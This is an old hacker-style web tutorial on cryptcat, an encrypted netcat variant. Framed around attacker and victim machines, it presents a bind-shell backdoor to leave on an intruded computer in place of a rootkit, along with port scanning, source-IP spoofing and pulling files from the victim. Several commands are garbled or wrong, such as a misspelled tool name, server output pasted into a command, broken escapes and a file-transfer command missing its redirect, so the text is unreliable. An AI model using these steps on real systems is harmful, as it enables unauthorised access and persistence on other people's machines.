Cryptcat: Advanced Usage

Cryptcat: Advanced Usage

By ghost | 14548 Reads |

0     0

+=+=+=+=+=+=+=+=+= Cryptcat: Advanced Usage +=+=+=+=+=+=+=+=+=

++||||||> CRYPTCAT <|||||||||++

It is, basically, netcat with encryption (twofish) turned ON. So instead of having communications sent/received in clear text, you have it encrypted in twofish… So it doesn't get sniffed!

This tool is often referred to as the "TCP/IP Swiss Army Knife", because of its ability to establish various connections across networks.

So, if you've ever used netcat, then it should be easy for you to use cryptcat. The Syntax for using command line is the same.

Let's start by explaining the basic usage of it, by examples, then move on to m0re compleX stuff:

First, to establish a connection between two machines, we'd go about this by:

-= making machine #1 (local/victim) listen on a port (with an IP of 192.168.1.1) =-

$ crypcat -l -p 3333

-= Making machine #2 (remote/attacker) establish connection (from 192.168.1.2) =-

$ cryptcat 192.168.1.1 3333

You can also use cryptcat for banner grabbing, ie. for SNMTP servers:

$ cryptcat 192.168.1.1 25 220 192.168.1.1 ESMTP Sendmail 8.10.2+Sun/8.10.2; Sun 19 Feb 2007 12:25:02 -0500 (EST)

this should connect you to the SNMTP server, and output the server's Name and Version.

Can also use cryptcat as a script to banner grab, say on an HTTP server, as such:

$ cryptcat hostname 80 < get_reqst.txt

set get_reqst.txt to contain the following script:

HEAD / HTTP/1.0[ENTER] [ENTER]

(don't actually type in [ENTER], rather, just press it twice) duh!.

OR — try (from the SHELL):

$ echo -e "GET 192.168.1.1 HTTP/1.0nn" | cryptcat –w 5 192.168.1.1 80

Say, instead of using a ROOTKIT after intruding on a computer, you can simply use cryptcat to get a SHELL every time you connect to a port you specify for the local machine to listen onto with cryptcat. This is a simple backd00r. To do this, simply type on the local/victim machine:

$ cryptcat -e /bin/sh -l -p 9999

(that's assuming the user is using UNIX) Now, as the attacker, all you need to do is either connect from your machine (or locally) to the victim, then that should spawn a shell for j00.

$ cryptcat 192.168.1.1 9999 -e /bin/sh

You can even make cryptcat act like a PORT SCANNER with:

$ cryptcat -v -z 192.168.1.1 1-9999

this scans 192.168.1.1 for ports 1 to 9999

Also, you can use it to sp00f your source IP Address:

$ cryptcat -s 69.13.37.69 192.168.1.1

remember, the sp00fed IP address (69.13.37.69) come before the remote IP address (192.168.1.1). This causes the remote host to respond back to the sp00fed IP address. Don't start thinking of how malicious you can be with this!

Ah, yes, and one of my favourites… Transfering Files. To do this, simply, set a computer (not necessarily a victim) to host a file (take_me.txt):

$ cryptcat -v -l -p 9999 < take_me.txt

Now, to get take_me.txt, all we do on the client is:

$ cryptcat -v 192.168.1.1 9999 take_me.txt

Note: 192.168.1.1 is still the server/victim.

And finally, you can use it for source-routing to connect to a port on a remote host:

$ cryptcat -g 69.13.37.69 192.168.1.1 9999

Note: 69.13.37.69 is gateway we're going through to connect to 192.168.1.1 to port 9999

LINKS HOMEPAGE: http://farm9.org/Cryptcat/ Download: http://sourceforge.net/projects/cryptcat/ Man Page: http://www.phlak.org/docs/tools/cryptcat.txt

Hope you learned s0mething at least. Expect more! And …

Always Remember! 1: Netfish is RIGHT. 2: If {you think Netfish is WRONG} then SLAP YOURSELF, and goto the FIRST POINT.